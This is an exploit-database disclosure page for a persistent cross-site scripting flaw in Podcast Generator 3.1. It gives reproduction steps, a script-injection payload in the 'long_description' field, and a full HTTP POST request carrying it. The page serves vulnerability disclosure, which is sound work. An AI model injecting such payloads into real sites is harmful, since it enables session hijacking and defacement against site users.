what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Podcast Generator 3.1 Cross Site Scripting

Podcast Generator 3.1 Cross Site Scripting
Posted May 14, 2021
Authored by Aysenur Karaaslan

Podcast Generator version 3.1 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 840b593eef104807a7745abe50d24a7b92b240507d60f8d83ef4cac384676b7f

Podcast Generator 3.1 Cross Site Scripting

Change Mirror Download
# Exploit Title: Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)
# Date: 13/05/2021
# Exploit Author: Ay┼čenur KARAASLAN
# Vendor Homepage: https://podcastgenerator.net/demoV2/
# Software Link: https://podcastgenerator.net/download and https://github.com/PodcastGenerator/PodcastGenerator/archive/v3.1.1.zip
# Version: < 3.1.1
# CVE: N/A

Podcast Generator is an open source Content Management System written in PHP and specifically designed for podcast publishing.

#Description
The following is PoC to use the XSS bug with unauthorized user.

1. Login to your admin account.
2. "Upload New Episode" or "Edit" field has got "Long Description". Long Description field is not filtered. It is possible to place JavaScript code.
3. Click the Home button
4. Click "More" button of created or edited episode.

# Vulnerable Parameter Type: POST
# Vulnerable Parameter: long_description
# Attack Pattern: <script>prompt("Aysenur-PoC")</script>

#PoC
HTTP Request:

POST /demoV2/pg/?p=admin&do=edit&c=ok HTTP/1.1
Host: podcastgenerator.net
Cookie: PHPSESSID=2k93317b1dcraih0ti3p8rehc4;
_ga=GA1.2.2015734934.1620928725; _gid=GA1.2.1455863373.1620928725
Content-Length: 1590
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://podcastgenerator.net
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryMJiUJ3BGzyG5zwxd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: frame
Referer:
https://podcastgenerator.net/demoV2/pg/?p=admin&do=edit&=episode&name=aysenurxss-poc.jpg
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="userfile"

aysenurxss-poc.jpg
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="title"

Aysenur-PoC
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="description"

poc
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="countdown"

255
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="category[]"

about
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Day"

13
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Month"

5
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Year"

2021
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Hour"

14
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Minute"

29
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="long_description"

<script>prompt("aysenur-xss")</script>
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="keywords"

poc
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="explicit"

no
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="auth_name"

aysenur
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="auth_email"

aysenur@emailaddress.com
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd--
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    33 Files
  • 8
    Feb 8th
    34 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close